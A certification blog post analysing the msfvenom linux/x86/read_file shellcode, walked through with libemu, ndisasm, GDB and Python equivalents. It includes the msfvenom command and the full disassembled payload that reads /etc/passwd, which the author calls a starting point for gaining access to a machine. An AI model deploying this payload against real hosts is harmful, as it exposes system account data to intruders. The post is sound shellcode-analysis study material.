This blog post was created to fulfill the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134
Assignment number: 5.2
Github repo: https://github.com/kkirsche/SLAE
Introduction
Hey everyone! Today, we’re going to keep moving forward with our shellcode analysis work. Like last time, instead of writing our own assembly code, we’re going to analyze someone else’s.
Requirements
- Take at least 3 shellcode samples created using msfvenom for x86 Linux
- Use GDB, ndisasm, and/or libemu to dissect the functionality of the shellcode
- Present your analysis
As we said before, this isn’t going to be the complete assignment 5. Instead, this post discusses the second of the three shellcode samples generated using msfvenom for x86 Linux, and I’ll write another article to discuss the final payload. With that in mind, we can still meet the other two goals.
Our shellcode
So to get started, I had to choose what shellcode I was going to analyze. After looking through msfvenom’s payloads, I found one which seemed like it’d be interesting — the linux/x86/read_file payload by hal.
I think this one will be interesting to review because I wanted to focus on topics we didn’t explicitly cover in the SLAE course, such as reading file contents using NASM.
If we take a look at what options we have, we see there are a fair number of them:
Looking at these, there are a number of advanced options which we won’t be working with. Instead, we’ll focus on FD (the file descriptor to write to) and PATH (the path of the file whose contents we’ll dump).
In our case, we’ll stick to FD 1 (stdout) for our file descriptor. This will simplify the setup required to analyze the shellcode. We do need to set the path though. We’ll dump /etc/passwd, as that’s often a good starting point when we are trying to get access to a machine.
Let’s dig into our shellcode though!
Libemu
We’ll start off by analyzing the payload with libemu, which provides the sctest binary for emulating what a payload does. We won’t cover the options in detail, since we did that in the first shellcode analysis post. The basics are that we’re enabling verbose mode (-vvv), reading the payload to analyze from stdin (-S), and running for up to 10000 steps (-s 10000). If we’re lucky, this will give us pseudocode to start our analysis with.
msfvenom -e generic/none -a x86 --platform linux -p linux/x86/read_file PATH=/etc/passwd | sctest -vvv -Ss 10000
Sadly, like last time, we don’t get any pseudocode. If we take a look at the execution graph, hopefully we’ll get a bit more. Realistically, I expect we’ll need to drop into ndisasm and walk through the assembly at a lower level to really analyze this.
msfvenom -e generic/none -a x86 --platform linux -p linux/x86/read_file PATH=/etc/passwd | sctest -vvv -Ss 10000 -G read_file.dot && dot read_file.dot -T png > read_file.png
Sadly, this gives us an empty image. We need to drop directly into the raw assembly language instructions instead.
ndisasm
~ $ msfvenom -e generic/none -a x86 --platform linux -p linux/x86/read_file PATH=/etc/passwd | ndisasm -u -
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 73 (iteration=0)
generic/none chosen with final size 73
Payload size: 73 bytes
00000000 EB36 jmp short 0x38
00000002 B805000000 mov eax,0x5
00000007 5B pop ebx
00000008 31C9 xor ecx,ecx
0000000A CD80 int 0x80
0000000C 89C3 mov ebx,eax
0000000E B803000000 mov eax,0x3
00000013 89E7 mov edi,esp
00000015 89F9 mov ecx,edi
00000017 BA00100000 mov edx,0x1000
0000001C CD80 int 0x80
0000001E 89C2 mov edx,eax
00000020 B804000000 mov eax,0x4
00000025 BB01000000 mov ebx,0x1
0000002A CD80 int 0x80
0000002C B801000000 mov eax,0x1
00000031 BB00000000 mov ebx,0x0
00000036 CD80 int 0x80
00000038 E8C5FFFFFF call 0x2
0000003D 2F das
0000003E 657463 gs jz 0xa4
00000041 2F das
00000042 7061 jo 0xa5
00000044 7373 jnc 0xb9
00000046 7764 ja 0xac
00000048 00 db 0x00
There we go. With a reasonably solid background in assembly, this should be fairly easy for us to understand.
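Before walking through the code, it’s worth noting that the last 12 bytes, which ndisasm shows as das, gs jz, jo, jnc, ja and db, aren’t instructions at all; ndisasm simply decodes every byte it’s given. This small Python sketch (PAYLOAD_HEX, CODE_END and trailing_data are illustrative names, not part of msfvenom) rebuilds the 73 bytes from the listing and slices off everything after the call instruction at 0x38:

```python
# The 73 payload bytes exactly as ndisasm printed them above.
PAYLOAD_HEX = (
    "eb36"                      # jmp short 0x38
    "b805000000" "5b" "31c9"    # mov eax,0x5 / pop ebx / xor ecx,ecx
    "cd80"                      # int 0x80 (open)
    "89c3" "b803000000"         # mov ebx,eax / mov eax,0x3
    "89e7" "89f9"               # mov edi,esp / mov ecx,edi
    "ba00100000" "cd80"         # mov edx,0x1000 / int 0x80 (read)
    "89c2" "b804000000"         # mov edx,eax / mov eax,0x4
    "bb01000000" "cd80"         # mov ebx,0x1 / int 0x80 (write)
    "b801000000" "bb00000000"   # mov eax,0x1 / mov ebx,0x0
    "cd80"                      # int 0x80 (exit)
    "e8c5ffffff"                # call 0x2
    "2f6574632f70617373776400"  # decoded by ndisasm as das, gs jz, jo, ...
)
PAYLOAD = bytes.fromhex(PAYLOAD_HEX)

CODE_END = 0x3D  # first byte after the call instruction


def trailing_data(payload: bytes) -> bytes:
    """Return the bytes after the call, i.e. the data ndisasm tried to decode."""
    return payload[CODE_END:]
```

With 61 (0x3D) bytes of code plus the 11-character path and its null terminator, we get exactly the 73 bytes msfvenom reported, and `trailing_data(PAYLOAD)` comes back as `b"/etc/passwd\x00"`.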
First function
Unlike the shell_find_tag payload we worked with in our last analysis, this one doesn’t immediately begin with its first system call. Let’s look at a subset of the instructions to see what we mean:
00000000 EB36 jmp short 0x38
00000002 B805000000 mov eax,0x5
00000007 5B pop ebx
00000008 31C9 xor ecx,ecx
0000000A CD80 int 0x80
...
00000038 E8C5FFFFFF call 0x2
0000003D 2F das
...
If you’ve done much shellcoding before, you should recognize this JMP-CALL-POP sequence, which we use to find where a piece of data (like the path to our file) is located in memory without relying on hard-coded addresses.
First, we take a short jump from 00000000 to 00000038. There, we call 0x2, which brings us back up to the mov eax,0x5 instruction and pushes the address of the next instruction (offset 0000003D, the start of our path string) onto the stack. We can see this in GDB:
Here you can see the assembly before we execute the call. We then use stepi to step into the call, which pushes the address of the next instruction onto the stack as our return address. Examining the top of the stack verifies that this is in fact what happened: the saved return address points at our das instruction, which is really the "/" at the start of /etc/passwd.
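Both transfers in this sequence are relative: the jmp short uses a signed 8-bit displacement and the call uses a signed 32-bit one, each added to the address of the instruction that follows. This Python sketch (jmp_short_target and call_rel32_target are hypothetical helper names) decodes the two instructions from their raw bytes to confirm the targets ndisasm printed:

```python
import struct


def jmp_short_target(addr: int, code: bytes) -> int:
    """EB rel8: target = address of next instruction + signed 8-bit displacement."""
    if code[0] != 0xEB:
        raise ValueError("not a jmp short")
    rel8 = struct.unpack("<b", code[1:2])[0]  # signed byte
    return addr + 2 + rel8


def call_rel32_target(addr: int, code: bytes) -> tuple[int, int]:
    """E8 rel32: return (call target, return address the call pushes)."""
    if code[0] != 0xE8:
        raise ValueError("not a call rel32")
    rel32 = struct.unpack("<i", code[1:5])[0]  # signed little-endian dword
    return_address = addr + 5  # address of the instruction after the call
    return return_address + rel32, return_address


# jmp_short_target(0x00, bytes.fromhex("eb36"))        -> 0x38
# call_rel32_target(0x38, bytes.fromhex("e8c5ffffff")) -> (0x02, 0x3D)
```

Jumping forward first means the call goes backwards, so its displacement is negative (0xFFFFFFC5, i.e. -0x3B) and contains no null bytes. Since nothing depends on an absolute address, the code works wherever it’s loaded: at run time the pushed address is simply the load address plus 0x3D. In our GDB session EBX ends up as 0x8048091, which implies the payload started at 0x8048054.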
With the return address on the stack and execution back at 00000002, we move 0x5 into EAX. This sets up our first system call, SYS_OPEN:
int open(const char *pathname, int flags);
We then pop the return address into EBX, giving us a pointer to the PATH string that msfvenom appended to the payload.
We then XOR ECX with itself so that it’s 0x0, which is the value of the O_RDONLY flag. Finally, we trigger interrupt 0x80 to make the system call.
This leaves our registers looking like so after each instruction:
Address | Instruction | EAX | EBX | ECX | EDX | EDI |
00000002 | mov eax,0x5 | 0x5 | Unknown | Unknown | Unknown | Unknown |
00000007 | pop ebx | 0x5 | 0x8048091 | Unknown | Unknown | Unknown |
00000008 | xor ecx,ecx | 0x5 | 0x8048091 | 0x0 | Unknown | Unknown |
0000000A | int 0x80 | 0x3 | 0x8048091 | 0x0 | Unknown | Unknown |
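For comparison, here is the same open call sketched in Python, whose os.open() wraps the C library’s open(). The constant names and the open_path helper are only for illustration; the numbers are the i386 Linux system call numbers this payload loads into EAX. One behavioral difference: the raw int 0x80 returns a negative errno value in EAX on failure (which this payload never checks), whereas os.open() raises OSError.

```python
import os

# i386 Linux system call numbers this payload places in EAX.
SYS_EXIT = 1
SYS_READ = 3
SYS_WRITE = 4
SYS_OPEN = 5


def open_path(path: str) -> int:
    """Rough equivalent of: mov eax,5 / pop ebx / xor ecx,ecx / int 0x80."""
    # O_RDONLY is 0, which is why zeroing ECX is all the payload needs
    # to request read-only access.
    return os.open(path, os.O_RDONLY)
```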
You’ll notice that after we trigger the interrupt, the value in EAX changes from 0x5 to 0x3, which is the return value of our call to open. We can read the open manpage for more information about the return value:
The return value of open() is a file descriptor, a small, nonnegative
integer that is used in subsequent system calls (read(2), write(2),
lseek(2), fcntl(2), etc.) to refer to the open file. The file
descriptor returned by a successful call will be the lowest-numbered
file descriptor not currently open for the process.
So we successfully called open! This is a good start.
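That "lowest-numbered" rule is why we got 3: a freshly started process usually already has 0, 1 and 2 open as stdin, stdout and stderr. Here’s a quick Python sketch (lowest_free_fd_demo is a hypothetical helper) showing the kernel reusing the lowest free descriptor, assuming no other thread opens or closes files while it runs:

```python
import os


def lowest_free_fd_demo(path: str) -> tuple[int, int, int]:
    """Show open() returning the lowest-numbered free file descriptor."""
    a = os.open(path, os.O_RDONLY)  # lowest free descriptor at this moment
    b = os.open(path, os.O_RDONLY)  # a is taken now, so b is higher
    os.close(a)                     # a becomes free again...
    c = os.open(path, os.O_RDONLY)  # ...so the kernel hands it back
    os.close(b)
    os.close(c)
    return a, b, c
```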
Second Function
Now that we have our file descriptor, we can start the second function:
0000000C 89C3 mov ebx,eax
0000000E B803000000 mov eax,0x3
00000013 89E7 mov edi,esp
00000015 89F9 mov ecx,edi
00000017 BA00100000 mov edx,0x1000
0000001C CD80 int 0x80
We first move the opened file descriptor from EAX into EBX, as it’ll be the first argument to our second system call. We then move 0x3 into EAX; 0x3 is the value representing the SYS_READ system call.
ssize_t read(int fd, void *buf, size_t count);
So we already have int fd covered by putting the file descriptor in EBX. Next, we copy ESP (the current top of the stack) into EDI and then into ECX, giving read a pointer to a buffer on the stack. Finally, we move 0x1000 (4096) into EDX as count, the maximum number of bytes to read, and trigger our interrupt.
Address | Instruction | EAX | EBX | ECX | EDX | EDI |
00000002 | mov eax,0x5 | 0x5 | Unknown | Unknown | Unknown | Unknown |
00000007 | pop ebx | 0x5 | 0x8048091 | Unknown | Unknown | Unknown |
00000008 | xor ecx,ecx | 0x5 | 0x8048091 | 0x0 | Unknown | Unknown |
0000000A | int 0x80 | 0x3 | 0x8048091 | 0x0 | Unknown | Unknown |
0000000C | mov ebx,eax | 0x3 | 0x3 | 0x0 | Unknown | Unknown |
0000000E | mov eax,0x3 | 0x3 | 0x3 | 0x0 | Unknown | Unknown |
00000013 | mov edi,esp | 0x3 | 0x3 | 0x0 | Unknown | 0xffffd190 |
00000015 | mov ecx,edi | 0x3 | 0x3 | 0xffffd190 | Unknown | 0xffffd190 |
00000017 | mov edx,0x1000 | 0x3 | 0x3 | 0xffffd190 | 0x1000 | 0xffffd190 |
0000001C | int 0x80 | 0xd3a | 0x3 | 0xffffd190 | 0x1000 | 0xffffd190 |
After the call, EAX holds a non-zero value: the number of bytes that were read. In our case, that’s 0xd3a hex, or 3386 decimal.
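Because the payload makes exactly one read() with a count of 0x1000, it only ever sees the first 4096 bytes of the file. That’s plenty for our 3386-byte /etc/passwd, but a larger file would be silently truncated. This Python sketch of the call (read_once and BUF_SIZE are illustrative names) makes that limit explicit:

```python
import os

BUF_SIZE = 0x1000  # the payload's EDX value: at most 4096 bytes


def read_once(fd: int) -> bytes:
    """Mirror of the payload's single read(fd, esp, 0x1000).

    There is no loop, so anything past the first BUF_SIZE bytes is never
    read. read() may also legitimately return fewer bytes than requested.
    """
    return os.read(fd, BUF_SIZE)
```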
Third Function
0000001E 89C2 mov edx,eax
00000020 B804000000 mov eax,0x4
00000025 BB01000000 mov ebx,0x1
0000002A CD80 int 0x80
This one is nice and short. We move the number of bytes we read into EDX, move 0x4 (the SYS_WRITE system call) into EAX, and then move 0x1 into EBX, which is the FD variable we passed to msfvenom; in our case, that’s stdout. ECX still holds the pointer to our stack buffer from the read call, so it doesn’t need to be set up again. We then trigger the interrupt to write the buffer to stdout.
Address | Instruction | EAX | EBX | ECX | EDX | EDI |
00000002 | mov eax,0x5 | 0x5 | Unknown | Unknown | Unknown | Unknown |
00000007 | pop ebx | 0x5 | 0x8048091 | Unknown | Unknown | Unknown |
00000008 | xor ecx,ecx | 0x5 | 0x8048091 | 0x0 | Unknown | Unknown |
0000000A | int 0x80 | 0x3 | 0x8048091 | 0x0 | Unknown | Unknown |
0000000C | mov ebx,eax | 0x3 | 0x3 | 0x0 | Unknown | Unknown |
0000000E | mov eax,0x3 | 0x3 | 0x3 | 0x0 | Unknown | Unknown |
00000013 | mov edi,esp | 0x3 | 0x3 | 0x0 | Unknown | 0xffffd190 |
00000015 | mov ecx,edi | 0x3 | 0x3 | 0xffffd190 | Unknown | 0xffffd190 |
00000017 | mov edx,0x1000 | 0x3 | 0x3 | 0xffffd190 | 0x1000 | 0xffffd190 |
0000001C | int 0x80 | 0xd3a | 0x3 | 0xffffd190 | 0x1000 | 0xffffd190 |
0000001E | mov edx,eax | 0xd3a | 0x3 | 0xffffd190 | 0xd3a | 0xffffd190 |
00000020 | mov eax,0x4 | 0x4 | 0x3 | 0xffffd190 | 0xd3a | 0xffffd190 |
00000025 | mov ebx,0x1 | 0x4 | 0x1 | 0xffffd190 | 0xd3a | 0xffffd190 |
0000002A | int 0x80 | 0xd3a | 0x1 | 0xffffd190 | 0xd3a | 0xffffd190 |
This returns the number of bytes written to the file descriptor in EAX. In our case that’s 0xd3a, the full file.
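The write side is the mirror image. In this Python sketch (FD and write_once are hypothetical names), the count returned by os.write() corresponds to the value the kernel leaves in EAX. Like the payload, it makes a single write() and doesn’t loop, even though write() is allowed to return fewer bytes than requested.

```python
import os

FD = 1  # msfvenom's FD option; 1 is stdout


def write_once(out_fd: int, data: bytes) -> int:
    """Mirror of: mov edx,eax / mov eax,0x4 / mov ebx,FD / int 0x80.

    The payload reuses ECX (the read buffer); here that's the data argument.
    Returns the number of bytes the kernel reports as written.
    """
    return os.write(out_fd, data)
```

For example, `write_once(FD, b"hello\n")` prints hello and returns 6.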
Final Function
0000002C B801000000 mov eax,0x1
00000031 BB00000000 mov ebx,0x0
00000036 CD80 int 0x80
This is nice and simple: 0x1 is SYS_EXIT, 0x0 in EBX is our exit status, and the interrupt exits the process cleanly.
Commented ASM Code
With a solid understanding of how this worked, let’s comment our assembly code accordingly:
00000000 EB36 jmp short 0x38 ; jump to 0x38 so that we get the address of our file path
00000002 B805000000 mov eax,0x5 ; SYS_OPEN system call
00000007 5B pop ebx ; file path into EBX
00000008 31C9 xor ecx,ecx ; O_RDONLY flag for SYS_OPEN command
0000000A CD80 int 0x80 ; execute SYS_OPEN function
0000000C 89C3 mov ebx,eax ; move the file descriptor which we've opened into EBX.
0000000E B803000000 mov eax,0x3 ; SYS_READ system call
00000013 89E7 mov edi,esp ; Move a pointer to our buffer into EDI.
00000015 89F9 mov ecx,edi ; Move the pointer into ECX for the buffer argument
00000017 BA00100000 mov edx,0x1000 ; define the size of our buffer
0000001C CD80 int 0x80 ; execute the READ call
0000001E 89C2 mov edx,eax ; Move the number of bytes read into EDX (the count for SYS_WRITE)
00000020 B804000000 mov eax,0x4 ; SYS_WRITE system call
00000025 BB01000000 mov ebx,0x1 ; Move the FD msfvenom variable into EBX (where we will write the file to)
0000002A CD80 int 0x80 ; Write the buffer still pointed to by ECX (this is where we see the contents!)
0000002C B801000000 mov eax,0x1 ; SYS_EXIT system call
00000031 BB00000000 mov ebx,0x0 ; exit status 0
00000036 CD80 int 0x80 ; exit cleanly
00000038 E8C5FFFFFF call 0x2 ; Call 0x2 so that we push the location of /etc/passwd onto the stack.
0000003D 2F das ; /
0000003E 657463 gs jz 0xa4 ; etc
00000041 2F das ; /
00000042 7061 jo 0xa5 ; pa
00000044 7373 jnc 0xb9 ; ss
00000046 7764 ja 0xac ; wd
00000048 00 db 0x00 ; null string terminator
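As a final cross-check, here’s the whole payload rendered as a rough Python sketch. It illustrates the same four system calls rather than replacing the shellcode: read_file_payload is a hypothetical name, Python raises exceptions where the shellcode would blindly carry on with a negative return value, and the sketch closes the file descriptor, which the shellcode leaves for exit to clean up.

```python
import os


def read_file_payload(path: str, out_fd: int = 1) -> int:
    """Open path, read up to 0x1000 bytes, write them to out_fd.

    Returns the number of bytes written (the final EAX before SYS_EXIT).
    """
    fd = os.open(path, os.O_RDONLY)     # SYS_OPEN: eax=5, ebx=path, ecx=0
    try:
        data = os.read(fd, 0x1000)      # SYS_READ: eax=3, ecx=buffer, edx=0x1000
    finally:
        os.close(fd)                    # not in the shellcode; exit releases it
    return os.write(out_fd, data)       # SYS_WRITE: eax=4, ebx=FD, edx=bytes read
```

Calling `read_file_payload("/etc/passwd")` followed by `os._exit(0)` (SYS_EXIT with status 0) roughly reproduces what we watched the payload do, as long as the file fits in the 4096-byte buffer.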
And with this, we now understand how this payload works! This is awesome.